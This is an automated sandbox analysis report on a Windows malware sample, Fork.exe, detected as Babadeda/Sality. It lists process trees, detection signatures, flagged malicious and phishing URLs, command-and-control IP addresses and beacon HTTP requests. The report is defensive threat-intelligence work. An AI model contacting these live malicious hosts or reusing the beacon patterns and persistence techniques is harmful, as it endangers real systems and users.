Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fork.exe

Overview

General Information

Sample name:Fork.exe
Analysis ID:1640074
MD5:63b6cebefec52083ac42eb8a39ab6683
SHA1:fb5be20e9327a66f05ff29b8458d0237c10ef7d6
SHA256:6702fef486a9118c11cbd50a3d920950a3e239332b4e2edc7ae84bd3c8951191
Tags:exeforkforkbombsalitytrojanvirususer-2huMarisa
Infos:

Detection

Babadeda
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babadeda
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file has a writeable .text section
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Fork.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\Fork.exe" MD5: 63B6CEBEFEC52083AC42EB8A39AB6683)
    • fontdrvhost.exe (PID: 768 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • cmd.exe (PID: 6196 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat C:\Users\user\Desktop\Fork.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • calc.exe (PID: 6304 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6340 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6380 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6444 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6632 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6796 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 5412 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7172 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7256 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7416 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7432 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7620 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7644 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7652 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7660 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7668 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7676 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7684 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7696 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8092 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8172 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 8180 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7180 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6932 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6936 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6916 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7188 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7296 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7388 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7256 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 7712 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6800 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • calc.exe (PID: 6064 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
    • fontdrvhost.exe (PID: 764 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 980 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • Calculator.exe (PID: 2316 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fork.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\winrhbwc.exeINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
    • 0x14:$b1: yrf<[LordPE]
    • 0x210:$b2: Hello world!
    C:\doxt.pifINDICATOR_EXE_Packed_SimplePolyEngineDetects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or SalityditekSHen
    • 0x14:$b1: yrf<[LordPE]
    • 0x210:$b2: Hello world!

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.0.Fork.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Modification of IE Registry Settings
      Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Fork.exe, ProcessId: 7112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-16T23:04:30.443194+010020181411A Network Trojan was detected3.229.117.5780192.168.2.949683TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-16T23:04:39.615704+010020377711A Network Trojan was detected3.229.117.5780192.168.2.949689TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-16T23:04:30.442279+010020183401Malware Command and Control Activity Detected192.168.2.9496833.229.117.5780TCP
      2025-03-16T23:04:32.050016+010020183401Malware Command and Control Activity Detected192.168.2.9496843.229.117.5780TCP
      2025-03-16T23:04:33.069551+010020183401Malware Command and Control Activity Detected192.168.2.9496853.229.117.5780TCP
      2025-03-16T23:04:34.249537+010020183401Malware Command and Control Activity Detected192.168.2.9496863.229.117.5780TCP
      2025-03-16T23:04:36.427630+010020183401Malware Command and Control Activity Detected192.168.2.9496873.229.117.5780TCP
      2025-03-16T23:04:38.004184+010020183401Malware Command and Control Activity Detected192.168.2.9496883.229.117.5780TCP
      2025-03-16T23:04:39.615694+010020183401Malware Command and Control Activity Detected192.168.2.9496893.229.117.5780TCP
      2025-03-16T23:04:40.387921+010020183401Malware Command and Control Activity Detected192.168.2.9496903.229.117.5780TCP
      2025-03-16T23:04:42.547516+010020183401Malware Command and Control Activity Detected192.168.2.9496913.229.117.5780TCP
      2025-03-16T23:04:43.450009+010020183401Malware Command and Control Activity Detected192.168.2.9496923.229.117.5780TCP
      2025-03-16T23:04:44.221151+010020183401Malware Command and Control Activity Detected192.168.2.9496933.229.117.5780TCP
      2025-03-16T23:04:45.214955+010020183401Malware Command and Control Activity Detected192.168.2.9496943.229.117.5780TCP
      2025-03-16T23:04:46.797140+010020183401Malware Command and Control Activity Detected192.168.2.9496963.229.117.5780TCP
      2025-03-16T23:04:47.932507+010020183401Malware Command and Control Activity Detected192.168.2.9496983.229.117.5780TCP
      2025-03-16T23:04:50.169165+010020183401Malware Command and Control Activity Detected192.168.2.9497003.229.117.5780TCP
      2025-03-16T23:04:51.260540+010020183401Malware Command and Control Activity Detected192.168.2.9497043.229.117.5780TCP
      2025-03-16T23:04:54.378866+010020183401Malware Command and Control Activity Detected192.168.2.9497073.229.117.5780TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-16T23:04:30.442279+010028032702Potentially Bad Traffic192.168.2.9496833.229.117.5780TCP
      2025-03-16T23:04:32.050016+010028032702Potentially Bad Traffic192.168.2.9496843.229.117.5780TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Fork.exeAvira: detected
      Antivirus detection for URL or domain
      Source: http://arimaexim.com/logo.gif?3db8193=582454827Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?1308dd2=179633250Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?cb4dd6=106589872Avira URL Cloud: Label: malware
      Source: http://arimaexim.com/logo.gif?18828d2=179903934Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?175d7eb=196001624Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?1e72e91=159639765Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?47a8101=225411843Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?79b3d2=31903560Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?b2e175=46892500Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?2f2bdaf=494627030Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?3115e42=514698900Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?263b431=280620375Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?1113539=107429718Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?282bcc5=294857059Avira URL Cloud: Label: malware
      Source: http://bhagavatirannade.org/logo.gif?6b3a03=28108812Avira URL Cloud: Label: phishing
      Source: http://bhagavatirannade.org/logo.gif?3925b70=239693248Avira URL Cloud: Label: phishing
      Source: http://arimaexim.com/logo.gif?2063744=237732572Avira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exeAvira: detection malicious, Label: W32/Sality.AT
      Source: C:\doxt.pifAvira: detection malicious, Label: W32/Sality.AT
      Multi AV Scanner detection for submitted file
      Source: Fork.exeVirustotal: Detection: 85%Perma Link
      Source: Fork.exeReversingLabs: Detection: 97%
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Fork.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

      Spreading

      barindex
      Creates autorun.inf (USB autostart)
      Source: C:\Users\user\Desktop\Fork.exeFile created: C:\autorun.infJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: x:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: w:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: v:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: u:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: t:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: s:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: r:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: q:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: p:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: o:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: n:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: m:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: l:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: k:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: j:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: i:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: h:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: g:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: f:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: e:Jump to behavior
      Source: C:\Windows\System32\cmd.exeFile opened: c:Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmpJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49689 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49693 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49687 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49683 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49694 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49688 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49696 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49686 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49704 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49690 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49692 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49700 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49684 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49691 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49685 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49707 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.9:49698 -> 3.229.117.57:80
      Source: global trafficUDP traffic: 192.168.2.9:53030 -> 46.98.127.9:6759
      Source: Joe Sandbox ViewIP Address: 3.229.117.57 3.229.117.57
      Source: Joe Sandbox ViewIP Address: 46.98.127.9 46.98.127.9
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49683 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49684 -> 3.229.117.57:80
      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.9:49689
      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.9:49683
      Source: global trafficHTTP traffic detected: GET /logo.gif?6b3a03=28108812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /logo.gif?79b3d2=31903560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /logo.gif?b2e175=46892500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?cb4dd6=106589872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?1113539=107429718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?1308dd2=179633250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162674|1742162671|1|2|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?175d7eb=196001624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162676|1742162670|2|3|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?18828d2=179903934 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162677|1742162671|2|3|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?1e72e91=159639765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162679|1742162670|2|4|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?2063744=237732572 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162680|1742162671|2|4|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?263b431=280620375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162682|1742162670|2|5|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?282bcc5=294857059 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162683|1742162671|2|5|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?2f2bdaf=494627030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162684|1742162670|2|6|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3115e42=514698900 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162685|1742162671|2|6|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3925b70=239693248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162686|1742162670|2|7|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?3db8193=582454827 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162687|1742162671|2|7|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?47a8101=225411843 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162690|1742162670|3|8|0; snkz=8.46.123.189
      Source: unknownUDP traffic detected without corresponding DNS query: 46.98.127.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /logo.gif?6b3a03=28108812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /logo.gif?79b3d2=31903560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /logo.gif?b2e175=46892500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162670|1742162670|0|1|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?cb4dd6=106589872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arimaexim.comCache-Control: no-cacheCookie: btst=acc469ad5798e78776e802948adc19bc|8.46.123.189|1742162671|1742162671|0|1|0; snkz=8.46.123.189
      Source: global trafficHTTP traffic detected: GET /logo.gif?1113539=107429718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: bhagavatirannade.orgCache-Control: no-cacheCookie: btst=8653accb3aefae727e92ce4a7b405e3d|8.46.123.189|1742162673|1742162670|1|2|0; snkz=8.46.123.189
